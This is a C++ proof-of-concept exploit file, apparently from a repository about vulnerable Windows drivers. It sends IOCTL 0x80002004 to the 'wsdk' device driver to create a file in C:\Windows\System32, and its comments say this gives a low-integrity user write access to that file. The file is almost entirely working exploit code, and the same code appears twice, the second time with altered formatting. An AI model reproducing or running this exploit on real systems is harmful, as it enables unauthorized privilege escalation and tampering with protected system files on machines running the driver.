420SmokeBigWeedHackBadDrivers/lmfao.cpp

## lmfao.cpp
// exploitation will require issuing the described IOCTL
// once complete, a low integrity user may obtain write-privileges to the file
// by re-opening with CreateFileA / NtCreateFile

#include <Windows.h>
#include <stdio.h>

#define IOCTL_WAV_CREATE_FILE 0x80002004
const char* g_DeviceName = R"(\\.\wsdk)";

BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle);

typedef struct WSDK_CREATE {
	DWORD dwDisposition;
	DWORD dwAccessMask; // 0x10
	BYTE reserved0[0x6c];
	WCHAR wstrFileName[MAX_PATH + 1];
} WSDK_CREATE, * PWSDK_CREATE;

typedef struct WSDK_CREATE_OUT {
	HANDLE hFile;
	NTSTATUS status;
}WSDK_CREATE_OUT, * PWSDK_CREATE_OUT;

BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle)
{
	DWORD dwBytesReturned = 0;
	HANDLE hHeap = GetProcessHeap();
	if (!lpOutHandle) {
		return FALSE;
	}

	LPVOID lpOutBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
	if (!lpOutBuffer) {
		return FALSE;
	}

	PWSDK_CREATE lpCreateArgs = (PWSDK_CREATE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(WSDK_CREATE));
	if (!lpCreateArgs) {
		HeapFree(hHeap, 0, lpOutBuffer);
		return FALSE;
	}

	lpCreateArgs->dwAccessMask = 1;
	lpCreateArgs->dwDisposition = 0;

	memcpy(lpCreateArgs->wstrFileName, strFileName, lstrlenW(strFileName) * sizeof(wchar_t));

	BOOL bRes = DeviceIoControl(
		hDevice,
		IOCTL_WAV_CREATE_FILE,
		lpCreateArgs,
		sizeof(WSDK_CREATE),
		lpOutBuffer,
		0x1000,
		&dwBytesReturned,
		NULL
	);

	if (!bRes) {
		printf("DeviceIoControl - %x\n", GetLastError());
		return FALSE;
	}

	PWSDK_CREATE_OUT lpOutInfo = (PWSDK_CREATE_OUT)lpOutBuffer;

	if (lpOutInfo->hFile && !lpOutInfo->status) {
		*lpOutHandle = lpOutInfo->hFile;
		HeapFree(hHeap, 0, lpOutBuffer);
		HeapFree(hHeap, 0, lpCreateArgs);
		return TRUE;
	}

	HeapFree(hHeap, 0, lpOutBuffer);
	HeapFree(hHeap, 0, lpCreateArgs);
	return FALSE;
}

int main() {
	HANDLE hDevice = CreateFileA(
		g_DeviceName,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
	);

	if (!hDevice || hDevice == INVALID_HANDLE_VALUE) {
		printf("CreateFileA - %x\n", GetLastError());
		return -1;
	}

	HANDLE hFile = 0;
	BOOL bResult = 	WAV_CreateFile(hDevice, LR"(\??\C:\Windows\System32\lmfao.dll)", FALSE, &hFile);
	if (bResult) {
		printf("Got handle to file: %p\n", hFile);
	}

	return 0;
}
	// exploitation will require issuing the described IOCTL
	// once complete, a low integrity user may obtain write-privileges to the file
	// by re-opening with CreateFileA / NtCreateFile

	#include <Windows.h>
	#include <stdio.h>

	#define IOCTL_WAV_CREATE_FILE 0x80002004
	const char* g_DeviceName = R"(\\.\wsdk)";

	BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle);

	typedef struct WSDK_CREATE {
	DWORD dwDisposition;
	DWORD dwAccessMask; // 0x10
	BYTE reserved0[0x6c];
	WCHAR wstrFileName[MAX_PATH + 1];
	} WSDK_CREATE, * PWSDK_CREATE;

	typedef struct WSDK_CREATE_OUT {
	HANDLE hFile;
	NTSTATUS status;
	}WSDK_CREATE_OUT, * PWSDK_CREATE_OUT;

	BOOL WAV_CreateFile(HANDLE hDevice, const wchar_t* strFileName, BOOL bOpenExisting, PHANDLE lpOutHandle)
	{
	DWORD dwBytesReturned = 0;
	HANDLE hHeap = GetProcessHeap();
	if (!lpOutHandle) {
	return FALSE;
	}

	LPVOID lpOutBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x1000);
	if (!lpOutBuffer) {
	return FALSE;
	}

	PWSDK_CREATE lpCreateArgs = (PWSDK_CREATE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(WSDK_CREATE));
	if (!lpCreateArgs) {
	HeapFree(hHeap, 0, lpOutBuffer);
	return FALSE;
	}

	lpCreateArgs->dwAccessMask = 1;
	lpCreateArgs->dwDisposition = 0;

	memcpy(lpCreateArgs->wstrFileName, strFileName, lstrlenW(strFileName) * sizeof(wchar_t));

	BOOL bRes = DeviceIoControl(
	hDevice,
	IOCTL_WAV_CREATE_FILE,
	lpCreateArgs,
	sizeof(WSDK_CREATE),
	lpOutBuffer,
	0x1000,
	&dwBytesReturned,
	NULL
	);

	if (!bRes) {
	printf("DeviceIoControl - %x\n", GetLastError());
	return FALSE;
	}

	PWSDK_CREATE_OUT lpOutInfo = (PWSDK_CREATE_OUT)lpOutBuffer;

	if (lpOutInfo->hFile && !lpOutInfo->status) {
	*lpOutHandle = lpOutInfo->hFile;
	HeapFree(hHeap, 0, lpOutBuffer);
	HeapFree(hHeap, 0, lpCreateArgs);
	return TRUE;
	}

	HeapFree(hHeap, 0, lpOutBuffer);
	HeapFree(hHeap, 0, lpCreateArgs);
	return FALSE;
	}

	int main() {
	HANDLE hDevice = CreateFileA(
	g_DeviceName,
	GENERIC_READ \| GENERIC_WRITE,
	FILE_SHARE_READ \| FILE_SHARE_WRITE,
	NULL,
	OPEN_EXISTING,
	FILE_ATTRIBUTE_NORMAL,
	NULL
	);

	if (!hDevice \|\| hDevice == INVALID_HANDLE_VALUE) {
	printf("CreateFileA - %x\n", GetLastError());
	return -1;
	}

	HANDLE hFile = 0;
	BOOL bResult = WAV_CreateFile(hDevice, LR"(\??\C:\Windows\System32\lmfao.dll)", FALSE, &hFile);
	if (bResult) {
	printf("Got handle to file: %p\n", hFile);
	}

	return 0;
	}